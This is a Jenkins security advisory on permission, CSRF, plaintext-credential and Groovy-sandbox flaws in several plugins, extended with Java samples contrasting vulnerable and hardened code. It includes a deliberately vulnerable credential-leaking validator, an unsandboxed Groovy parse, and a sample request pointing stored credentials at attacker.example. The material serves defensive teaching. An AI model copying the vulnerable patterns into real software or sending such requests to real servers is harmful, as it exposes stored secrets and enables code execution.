This advisory announces vulnerabilities in the following Jenkins deliverables:
gitlab-plugin
GitLab Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to make the controller connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, so that credentials stored in Jenkins were sent to, and could be captured by, the attacker's server.
Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.
This form validation method now requires POST requests and Overall/Administer permissions.
jira-ext
jira-ext Plugin stored credentials unencrypted in its global configuration file hudson.plugins.jira.JiraProjectProperty.xml on the Jenkins controller.
These credentials could be viewed by users with access to the Jenkins controller file system.
jira-ext Plugin now stores credentials encrypted.
azure-publishersettings-credentials
Azure PublisherSettings Credentials Plugin stored the service management certificate unencrypted in credentials.xml on the Jenkins controller.
These credentials could be viewed by users with access to the Jenkins controller file system.
Azure PublisherSettings Credentials Plugin has been deprecated. Azure PublisherSettings Credentials Plugin 1.5 no longer provides any user features and we recommend the plugin be uninstalled.
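The two entries above (jira-ext and Azure PublisherSettings Credentials) share the same flaw: a secret held in a plain String field, which XStream writes verbatim into the plugin's XML file on the controller. As an added illustration, not code from either plugin, the hypothetical global configuration below shows the plaintext field beside its hudson.util.Secret replacement and the migration of existing configuration files; the package, class and field names are assumptions.

```java
package io.example.jenkins; // hypothetical package; illustrative code, not from jira-ext or the Azure plugin

import hudson.Extension;
import hudson.util.Secret;
import jenkins.model.GlobalConfiguration;
import org.kohsuke.stapler.DataBoundSetter;

/** Global settings for a hypothetical "Example Service" integration, persisted by XStream. */
@Extension
public class ExampleServiceConfiguration extends GlobalConfiguration {

    // BEFORE (the flaw in the advisory): a plain String is written verbatim to
    // $JENKINS_HOME/io.example.jenkins.ExampleServiceConfiguration.xml, e.g.
    //   <apiToken>hunter2</apiToken>
    // Kept only so that existing configuration files can be migrated; see readResolve().
    @Deprecated
    private String apiToken;

    // AFTER: hudson.util.Secret. XStream persists Secret.getEncryptedValue(), e.g.
    //   <secretApiToken>{AQAAABAAAAAw...}</secretApiToken>
    // encrypted with the instance key kept under $JENKINS_HOME/secrets/.
    private Secret secretApiToken;

    public ExampleServiceConfiguration() {
        load(); // deserializes the XML file; readResolve() below runs as part of this
    }

    /** Converts configuration files written by the old plaintext field on first load. */
    private Object readResolve() {
        if (apiToken != null) {
            // fromString wraps a plaintext value; it also accepts an already-encrypted one
            secretApiToken = Secret.fromString(apiToken);
            apiToken = null;
            // The plaintext stays on disk until the configuration is next saved,
            // so a migration should be followed by a save of the global configuration.
        }
        return this;
    }

    public Secret getSecretApiToken() {
        return secretApiToken;
    }

    /** Bound from an <f:password field="secretApiToken"/> control; Stapler converts the submitted value to Secret. */
    @DataBoundSetter
    public void setSecretApiToken(Secret secretApiToken) {
        this.secretApiToken = secretApiToken;
        save();
    }

    /** Decrypt only at the point of use, and never log the result. */
    public String authorizationHeader() {
        return "Bearer " + Secret.toString(secretApiToken); // "" when unset
    }
}
```

A practitioner's check after upgrading a plugin that announces this kind of fix is to open the affected XML file on the controller and confirm the value is wrapped in braces rather than readable. The caveat is that Secret encryption uses a key stored under $JENKINS_HOME/secrets, so it protects the configuration file when it is copied, backed up, attached to a bug report or readable by an account with access only to that file; it does not protect against an attacker who can read all of JENKINS_HOME.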
deployit-plugin
A missing permission check in a form validation method in XebiaLabs XL Deploy Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified server with attacker-specified credentials.
Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.
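The GitLab Plugin and XebiaLabs XL Deploy Plugin entries describe the same weakness: a "test connection" form validation method that any Overall/Read user can call, with no permission check and no POST requirement. As an added illustration, not code from either plugin, the hypothetical global-configuration descriptor below puts that vulnerable shape next to the hardened one. The package, class and method names and the hypothetical server URL are assumptions.

```java
package io.example.jenkins; // hypothetical package; illustrative code, not from GitLab Plugin or XL Deploy Plugin

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import com.cloudbees.plugins.credentials.domains.DomainRequirement;
import hudson.Extension;
import hudson.security.ACL;
import hudson.util.FormValidation;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

/** Global configuration page for a hypothetical "Example Server" integration. */
@Extension
public class ExampleServerConfiguration extends GlobalConfiguration {

    /**
     * VULNERABLE shape (the pattern both advisory entries describe).
     * Stapler routes it at /descriptorByName/io.example.jenkins.ExampleServerConfiguration/testConnectionVulnerable
     * for any account with Overall/Read, via GET: no permission check, no @RequirePOST.
     */
    public FormValidation doTestConnectionVulnerable(@QueryParameter String serverUrl,
                                                     @QueryParameter String credentialsId) {
        // Resolves ANY credentials ID in the Jenkins store and sends it to serverUrl, which the
        // caller controls; a link embedding this URL makes an administrator's browser do the same (CSRF).
        return connect(serverUrl, lookup(credentialsId));
    }

    /** Hardened shape: a validator with side effects requires POST and an explicit permission. */
    @RequirePOST
    public FormValidation doTestConnection(@QueryParameter String serverUrl,
                                           @QueryParameter String credentialsId) {
        // Global configuration: only administrators may make the controller connect out with stored secrets.
        // For a job-level field, take an @AncestorInPath Item parameter and call item.checkPermission(Item.CONFIGURE).
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        return connect(serverUrl, lookup(credentialsId));
    }

    // The matching doFillCredentialsIdItems method (the "another method" that lists IDs) needs the same checks.
    private static StandardUsernamePasswordCredentials lookup(String credentialsId) {
        if (credentialsId == null || credentialsId.isEmpty()) {
            return null;
        }
        return CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StandardUsernamePasswordCredentials.class,
                        Jenkins.get(), ACL.SYSTEM, Collections.<DomainRequirement>emptyList()),
                CredentialsMatchers.withId(credentialsId));
    }

    /** HTTP GET with Basic authentication: this is the point at which the stored secret leaves Jenkins. */
    private static FormValidation connect(String serverUrl, StandardUsernamePasswordCredentials c) {
        if (c == null) {
            return FormValidation.error("Credentials not found");
        }
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(serverUrl).openConnection();
            String basic = c.getUsername() + ":" + c.getPassword().getPlainText();
            conn.setRequestProperty("Authorization", "Basic "
                    + Base64.getEncoder().encodeToString(basic.getBytes(StandardCharsets.UTF_8)));
            conn.setConnectTimeout(5000);
            conn.setReadTimeout(5000);
            int status = conn.getResponseCode();
            return status == 200 ? FormValidation.ok("Connected") : FormValidation.error("HTTP " + status);
        } catch (IOException e) {
            return FormValidation.error(e, "Connection failed");
        }
    }
}
```

To confirm an instance is exposed, a plain GET such as .../descriptorByName/io.example.jenkins.ExampleServerConfiguration/testConnectionVulnerable?serverUrl=http://attacker.example/&credentialsId=<id> (hypothetical path) from a non-administrator account should succeed only on the vulnerable variant; with @RequirePOST the GET is rejected before the method body runs, and checkPermission throws AccessDeniedException for non-administrators before any connection is opened. The vulnerable method is included only for contrast and has no place in real plugin code.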
ontrack
ontrack Jenkins Plugin supports sandboxed Groovy expressions. Its sandbox protection could be circumvented during parsing, compilation, and script instantiation by providing a crafted Groovy script.
This allowed users able to control the plugin’s job-specific configuration to bypass the sandbox protection and execute arbitrary code on the Jenkins controller.
ontrack Jenkins Plugin now uses Script Security APIs that apply sandbox protection during these phases.
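The ontrack entry hinges on where the sandbox boundary sits: wrapping only the call that runs the script leaves parsing, compilation and instantiation of the generated Script class unprotected. As an added illustration, not ontrack's code, the hypothetical evaluator below shows that shape beside one built on the Script Security plugin's SecureGroovyScript, which applies the sandbox (or script approval) to every phase. The class and method names and the "build" binding are assumptions.

```java
package io.example.jenkins; // hypothetical package; illustrative code, not from the ontrack plugin

import groovy.lang.Binding;
import groovy.lang.GroovyShell;
import groovy.lang.Script;
import hudson.model.Item;
import hudson.model.Run;
import jenkins.model.Jenkins;
import org.jenkinsci.plugins.scriptsecurity.sandbox.Whitelist;
import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.GroovySandbox;
import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript;
import org.jenkinsci.plugins.scriptsecurity.scripts.ApprovalContext;

/** Evaluates a job-configured Groovy expression against the current build. */
public final class JobExpressionEvaluator {

    /**
     * VULNERABLE shape: the sandbox only wraps execution of run().
     * shell.parse() compiles the source and instantiates the generated Script class first, so
     * anything that executes at parse, compile or construction time (compile-time AST
     * transformations, static initializers, the generated constructor) runs with no sandbox.
     */
    static Object evaluateUnsafely(String expression, Run<?, ?> run) throws Exception {
        Binding binding = new Binding();
        binding.setVariable("build", run);
        GroovyShell shell = new GroovyShell(Jenkins.get().getPluginManager().uberClassLoader, binding);
        Script script = shell.parse(expression);          // unsandboxed compile + instantiate
        return GroovySandbox.run(script, Whitelist.all());  // sandbox applies only from here
    }

    /**
     * Hardened shape: SecureGroovyScript owns the compiler configuration, class loader,
     * instantiation and execution, so the sandbox covers all of them.
     */
    static Object evaluate(String expression, Run<?, ?> run) throws Exception {
        Binding binding = new Binding();
        binding.setVariable("build", run);
        Item job = run.getParent();
        SecureGroovyScript script = new SecureGroovyScript(expression, true /* sandbox */, null /* no extra classpath */)
                // Records who configured the script for which job. With sandbox=false this is what
                // turns the script into a pending entry in In-process Script Approval instead of running it.
                .configuring(ApprovalContext.create().withCurrentUser().withItem(job));
        return script.evaluate(Jenkins.get().getPluginManager().uberClassLoader, binding);
    }
}
```

The practitioner's check when reviewing a plugin for this class of issue is to look for GroovyShell.parse, GroovyShell.evaluate or new GroovyShell outside of SecureGroovyScript or the GroovySandbox entry points that take source text rather than an already-parsed Script: whoever instantiates the script outside the sandbox owns the bypass. The configuring(...) call matters because the users who could exploit the ontrack issue were those with control over job configuration, exactly the population that script approval is designed to gate.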
These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.
As of publication of this advisory, no fixes are available for the following plugins:
The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities: